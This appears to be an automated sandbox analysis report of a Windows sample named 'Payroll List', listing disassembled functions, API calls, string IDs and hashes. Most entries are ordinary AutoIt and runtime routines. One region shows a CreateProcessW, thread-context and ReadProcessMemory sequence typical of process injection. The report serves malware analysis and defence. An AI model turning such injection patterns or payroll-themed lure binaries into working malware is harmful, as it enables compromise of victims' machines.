                                                                    • Instruction ID: 8d8a2f5d0c64a9ff85aa482a0cfbf0f496d5457990d99f95eb8299a903baf117
                                                                    • Opcode Fuzzy Hash: 2fb3aa39c0e9be9f02f6b3d9fdea35f98c480207dec4e5da2d47c4d876f6d762
                                                                    • Instruction Fuzzy Hash: 7F518F70D04249EBEF10DBA4D855BEEBB79EF08301F104199EA18BB2C1D7794A48CB75

                                                                    Control-flow Graph (figure not reproduced)
                                                                    APIs
                                                                      • Part of subcall function 001241A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001239FE,?,00000001), ref: 001241DB
                                                                    • _free.LIBCMT ref: 001936B7
                                                                    • _free.LIBCMT ref: 001936FE
                                                                      • Part of subcall function 0012C833: __wsplitpath.LIBCMT ref: 0012C93E
                                                                      • Part of subcall function 0012C833: _wcscpy.LIBCMT ref: 0012C953
                                                                      • Part of subcall function 0012C833: _wcscat.LIBCMT ref: 0012C968
                                                                      • Part of subcall function 0012C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0012C978
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                    • API String ID: 805182592-1757145024
                                                                    • Opcode ID: 9152f5a157d5f8110331eceea0c35516051061ddee9dcf438e18141cc6aa9812
                                                                    • Instruction ID: 438429fc3bf50e9dd7f8094f658259acc61bd6e91bd1cad69f435762fadfc177
                                                                    • Opcode Fuzzy Hash: 9152f5a157d5f8110331eceea0c35516051061ddee9dcf438e18141cc6aa9812
                                                                    • Instruction Fuzzy Hash: 88916371910229EFDF04EFA4DC919EDB7B4BF29310F104429F426EB291DB74AA55CB90
                                                                    APIs
                                                                      • Part of subcall function 00125374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,001E1148,?,001261FF,?,00000000,00000001,00000000), ref: 00125392
                                                                      • Part of subcall function 001249FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00124A1D
                                                                    • _wcscat.LIBCMT ref: 00192D80
                                                                    • _wcscat.LIBCMT ref: 00192DB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$FileModuleNameOpen
                                                                    • String ID: \$\Include\
                                                                    • API String ID: 3592542968-2640467822
                                                                    • Opcode ID: d2fe69726dd9c010c628fb5556a65ca8d381c04ad0d05d764fdf1d9b5f8d01ec
                                                                    • Instruction ID: c015b6039c454000912180c60336379cb070d96260350206d165ede9ddc05285
                                                                    • Opcode Fuzzy Hash: d2fe69726dd9c010c628fb5556a65ca8d381c04ad0d05d764fdf1d9b5f8d01ec
                                                                    • Instruction Fuzzy Hash: F75160714043809FC714EF95E9E189EB7F8BFA9300B50452EF644976A0EB709B98CB52
                                                                    APIs
                                                                    • __getstream.LIBCMT ref: 001434FE
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 00143539
                                                                    • __wopenfile.LIBCMT ref: 00143549
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                    • String ID: <G
                                                                    • API String ID: 1820251861-2138716496
                                                                    • Opcode ID: 60f3f224103d92cea8b61e228d927b989450adf31dd27f6fdf6dde6bc588cf44
                                                                    • Instruction ID: f1b0c50b40dd49f1a6922880d83022cea7283efc6351421820e1eef42a7ef697
                                                                    • Opcode Fuzzy Hash: 60f3f224103d92cea8b61e228d927b989450adf31dd27f6fdf6dde6bc588cf44
                                                                    • Instruction Fuzzy Hash: 6A11EC70A00206DFDB12BFB49C426AE36E4AF56350B198525F425DB2F1EB34CA1197B1
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0013D28B,SwapMouseButtons,00000004,?), ref: 0013D2BC
                                                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0013D28B,SwapMouseButtons,00000004,?,?,?,?,0013C865), ref: 0013D2DD
                                                                    • RegCloseKey.KERNELBASE(00000000,?,?,0013D28B,SwapMouseButtons,00000004,?,?,?,?,0013C865), ref: 0013D2FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 3677997916-824357125
                                                                    • Opcode ID: cf935f22fe667565d352d3b105db74632c090046b58794f37e10e0ee613b54e7
                                                                    • Instruction ID: d4a45e7e9a19b76da98537c7f0166516649d332d8f1a6df853eeadef4d8ea486
                                                                    • Opcode Fuzzy Hash: cf935f22fe667565d352d3b105db74632c090046b58794f37e10e0ee613b54e7
                                                                    • Instruction Fuzzy Hash: AF1135B5611208BFDB209FA8EC84EAF7BBCEF45744F104869F906D7210E731AE459B60
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 00D568C3
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D56959
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D5697B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1435038315.0000000000D54000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D54000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d54000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                    • Instruction ID: 13e8772bc8fab4ffd0502447729693decdac3617b06f4fb5695789b4aa959fac
                                                                    • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                    • Instruction Fuzzy Hash: 9A621D30A14218DBEB24CFA4C841BEEB772EF58301F5091A9D50DEB390E7759E85CB69
                                                                    APIs
                                                                      • Part of subcall function 001222A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,001224F1), ref: 00122303
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001225A1
                                                                    • CoInitialize.OLE32(00000000), ref: 00122618
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0019503A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID: P
                                                                    • API String ID: 3815369404-3564208636
                                                                    • Opcode ID: 6fe3a303068ea69396fe3c4bfedd9c356f47f994a8e82e12de4367d8b9fa342e
                                                                    • Instruction ID: c7d71472d9a0bd3cacf71cab06590e71263c62574538ee0d78c8e60a80016849
                                                                    • Opcode Fuzzy Hash: 6fe3a303068ea69396fe3c4bfedd9c356f47f994a8e82e12de4367d8b9fa342e
                                                                    • Instruction Fuzzy Hash: 94718DB49012C2ABC704EFAAADD049DBBA4BB693547A0456EE209DFBB1CB3044D0CF15
                                                                    APIs
                                                                      • Part of subcall function 00124517: _fseek.LIBCMT ref: 0012452F
                                                                      • Part of subcall function 0016C56D: _wcscmp.LIBCMT ref: 0016C65D
                                                                      • Part of subcall function 0016C56D: _wcscmp.LIBCMT ref: 0016C670
                                                                    • _free.LIBCMT ref: 0016C4DD
                                                                    • _free.LIBCMT ref: 0016C4E4
                                                                    • _free.LIBCMT ref: 0016C54F
                                                                      • Part of subcall function 00141C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00147A85), ref: 00141CB1
                                                                      • Part of subcall function 00141C9D: GetLastError.KERNEL32(00000000,?,00147A85), ref: 00141CC3
                                                                    • _free.LIBCMT ref: 0016C557
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                    • String ID:
                                                                    • API String ID: 1552873950-0
                                                                    • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                    • Instruction ID: 71fe7d5a96c2334a05f718a049e7f017131a56df5ce403d75a45bfe0aa37411d
                                                                    • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                    • Instruction Fuzzy Hash: 425161B1A04218AFDF249F64DC81BADBBB9EF58304F10009EF259E3251DB715A90CF58
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0013EBB2
                                                                      • Part of subcall function 001251AF: _memset.LIBCMT ref: 0012522F
                                                                      • Part of subcall function 001251AF: _wcscpy.LIBCMT ref: 00125283
                                                                      • Part of subcall function 001251AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00125293
                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 0013EC07
                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0013EC16
                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00193C88
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                    • String ID:
                                                                    • API String ID: 1378193009-0
                                                                    • Opcode ID: 8ca1fc87beee2e7cde8d41c371234d71b82ed75054e0467ab914a9c749b178aa
                                                                    • Instruction ID: 80e44090dfbd8e861a0d72342fa5fc868b6b16a01689cb281ca1459a7eaf31b7
                                                                    • Opcode Fuzzy Hash: 8ca1fc87beee2e7cde8d41c371234d71b82ed75054e0467ab914a9c749b178aa
                                                                    • Instruction Fuzzy Hash: A221FC70504B94AFEB379B24D855BEBBFEC9B05308F04048EE69F56181C3746A84CB51
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00193725
                                                                    • GetOpenFileNameW.COMDLG32 ref: 0019376F
                                                                      • Part of subcall function 0012660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001253B1,?,?,001261FF,?,00000000,00000001,00000000), ref: 0012662F
                                                                      • Part of subcall function 001240A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001240C6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                    • String ID: X
                                                                    • API String ID: 3777226403-3081909835
                                                                    • Opcode ID: 97d273a243a45e866be6e30b824505bfac998d664276f961e30117dfcef01dad
                                                                    • Instruction ID: 91ec5d464af48aa5080190dd36aa28f178232cc30e59a45864c080d4d30efa68
                                                                    • Opcode Fuzzy Hash: 97d273a243a45e866be6e30b824505bfac998d664276f961e30117dfcef01dad
                                                                    • Instruction Fuzzy Hash: FE21E771A002A8AFCF05DFD4D8457DEBBF8AF99304F00401AE515BB241DBB45A998F65
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 0016C72F
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0016C746
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: da9fe59bac0a66e64a8d22a92a68541d608640abaafb3b0723ca42851e2d23c2
                                                                    • Instruction ID: e8f6886f630ece63c31c4f9634f2da32c4d348851a41e0c82e279102eb01fc71
                                                                    • Opcode Fuzzy Hash: da9fe59bac0a66e64a8d22a92a68541d608640abaafb3b0723ca42851e2d23c2
                                                                    • Instruction Fuzzy Hash: C1D05E7550030EABDB10AB90EC0EFCA776C9700708F0002A27651A54B1DBB0E6D9CB55
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d268a57dff30748c6205d0509024e59fb5c8eb64cc40e6d81754d5ff083452ac
                                                                    • Instruction ID: 4ddfa200cab6347ba3b0a2919de9b01eb744c5d784429a06afeb6f04bc8c119c
                                                                    • Opcode Fuzzy Hash: d268a57dff30748c6205d0509024e59fb5c8eb64cc40e6d81754d5ff083452ac
                                                                    • Instruction Fuzzy Hash: B0F159716083019FCB14DF24C885B6AB7F5FF98314F14892EF9999B292D730E946CB82
                                                                    APIs
                                                                    • __FF_MSGBANNER.LIBCMT ref: 00143973
                                                                      • Part of subcall function 001481C2: __NMSG_WRITE.LIBCMT ref: 001481E9
                                                                      • Part of subcall function 001481C2: __NMSG_WRITE.LIBCMT ref: 001481F3
                                                                    • __NMSG_WRITE.LIBCMT ref: 0014397A
                                                                      • Part of subcall function 0014821F: GetModuleFileNameW.KERNEL32(00000000,001E0312,00000104,00000000,00000001,00000000), ref: 001482B1
                                                                      • Part of subcall function 0014821F: ___crtMessageBoxW.LIBCMT ref: 0014835F
                                                                      • Part of subcall function 00141145: ___crtCorExitProcess.LIBCMT ref: 0014114B
                                                                      • Part of subcall function 00141145: ExitProcess.KERNEL32 ref: 00141154
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    • RtlAllocateHeap.NTDLL(00D10000,00000000,00000001,00000001,00000000,?,?,0013F507,?,0000000E), ref: 0014399F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1372826849-0
                                                                    • Opcode ID: 17c1c1d47ee5cfba872def292073950d30df46affb033431216195076c4b0c79
                                                                    • Instruction ID: b838a773c9d96c2768761d247e9617ab84ff27e7d0be668f2837ccf87a64aeb2
                                                                    • Opcode Fuzzy Hash: 17c1c1d47ee5cfba872def292073950d30df46affb033431216195076c4b0c79
                                                                    • Instruction Fuzzy Hash: BA01F035345742AAE6263B74DC86B2E3348DF92768F210025F515DB6F2DFF4DD808660
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0016C385,?,?,?,?,?,00000004), ref: 0016C6F2
                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0016C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0016C708
                                                                    • CloseHandle.KERNEL32(00000000,?,0016C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0016C70F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: 415da04c988d250ffdb0025b18ee59c3ecfcc985e35e155b3385cb1f956532a4
                                                                    • Instruction ID: 3bd49231f0a72246f0ed232fce2e281f837883a50e411fd00d89b8d59c14305e
                                                                    • Opcode Fuzzy Hash: 415da04c988d250ffdb0025b18ee59c3ecfcc985e35e155b3385cb1f956532a4
                                                                    • Instruction Fuzzy Hash: 88E08632240614B7DB211B54BC09FDA7B19EB06771F104110FB55698E097B125618798
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0016BB72
                                                                      • Part of subcall function 00141C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00147A85), ref: 00141CB1
                                                                      • Part of subcall function 00141C9D: GetLastError.KERNEL32(00000000,?,00147A85), ref: 00141CC3
                                                                    • _free.LIBCMT ref: 0016BB83
                                                                    • _free.LIBCMT ref: 0016BB95
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                    • Instruction ID: 8e6d63bd279267f2ef50f02736562d670f13566a418ef2ec38d9807f1ff4b20f
                                                                    • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                                    • Instruction Fuzzy Hash: C0E05BB175574157DA3465796EC4EB313CD4F14351714081DB459E7146CF24F8D085B4
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 00123A73
                                                                      • Part of subcall function 00141405: __lock.LIBCMT ref: 0014140B
                                                                      • Part of subcall function 00123ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00123AF3
                                                                      • Part of subcall function 00123ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00123B08
                                                                      • Part of subcall function 00123D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00123AA3,?), ref: 00123D45
                                                                      • Part of subcall function 00123D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00123AA3,?), ref: 00123D57
                                                                      • Part of subcall function 00123D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,001E1148,001E1130,?,?,?,?,00123AA3,?), ref: 00123DC8
                                                                      • Part of subcall function 00123D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00123AA3,?), ref: 00123E48
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00123AB3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                    • String ID:
                                                                    • API String ID: 924797094-0
                                                                    • Opcode ID: 20efaeef13dec70c2297b49bb2f0684074fa621d7ca49a12a27537d2189a7528
                                                                    • Instruction ID: a7a4741809000391a987f6fb48af5bdf71a11e6060b35f6ccb5c02413b892385
                                                                    • Opcode Fuzzy Hash: 20efaeef13dec70c2297b49bb2f0684074fa621d7ca49a12a27537d2189a7528
                                                                    • Instruction Fuzzy Hash: 1A119071904381ABC700EFA5E88590EFBE8FFA5710F00491EF4898B6B1DB709694CB92
                                                                    APIs
                                                                    • ___lock_fhandle.LIBCMT ref: 0014EA29
                                                                    • __close_nolock.LIBCMT ref: 0014EA42
                                                                      • Part of subcall function 00147BDA: __getptd_noexit.LIBCMT ref: 00147BDA
                                                                      • Part of subcall function 00147C0E: __getptd_noexit.LIBCMT ref: 00147C0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
